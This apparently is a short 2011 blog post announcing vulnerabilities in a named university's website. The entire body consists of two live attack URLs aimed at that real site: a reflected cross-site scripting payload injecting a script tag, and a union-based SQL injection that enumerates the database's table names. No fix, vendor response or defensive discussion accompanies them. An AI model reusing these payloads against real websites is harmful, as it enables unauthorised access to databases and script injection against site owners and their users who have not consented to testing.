Multipule vulnerabilities Found in Standford University's website by Minhal Mehdi

Monday, June 27, 2011 // by Anonymous // Labels: , // 0 comments


Multipule vulnerabilities Found in Standford University's website by Minhal Mehdi

XSS:
http://english.stanford.edu/graduate.php?type=placement&order_by=year_appointed&order=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

SQLI:
http://english.stanford.edu/index.php?news_id=309%20union%20all%20select%201,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--

0 comments:

Post a Comment